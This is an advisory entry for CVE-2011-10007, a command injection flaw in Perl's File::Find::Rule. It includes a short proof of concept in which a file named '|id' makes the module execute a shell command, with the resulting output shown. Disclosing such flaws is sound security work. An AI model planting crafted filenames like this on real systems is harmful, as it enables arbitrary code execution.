CVE-2011-10007

Severity CVSS v4.0:
Pending analysis
Type:
CWE-78 OS Command Injections
Publication date:
05/06/2025
Last modified:
15/04/2026

Description

File::Find::Rule through 0.34 for Perl is vulnerable to Arbitrary Code Execution when `grep()` encounters a crafted filename.<br /> <br /> A file handle is opened with the 2 argument form of `open()` allowing an attacker controlled filename to provide the MODE parameter to `open()`, turning the filename into a command to be executed.<br /> <br /> Example:<br /> <br /> $ mkdir /tmp/poc; echo &gt; "/tmp/poc/|id"<br /> $ perl -MFile::Find::Rule \<br />     -E &amp;#39;File::Find::Rule-&gt;grep("foo")-&gt;in("/tmp/poc")&amp;#39;<br /> uid=1000(user) gid=1000(user) groups=1000(user),100(users)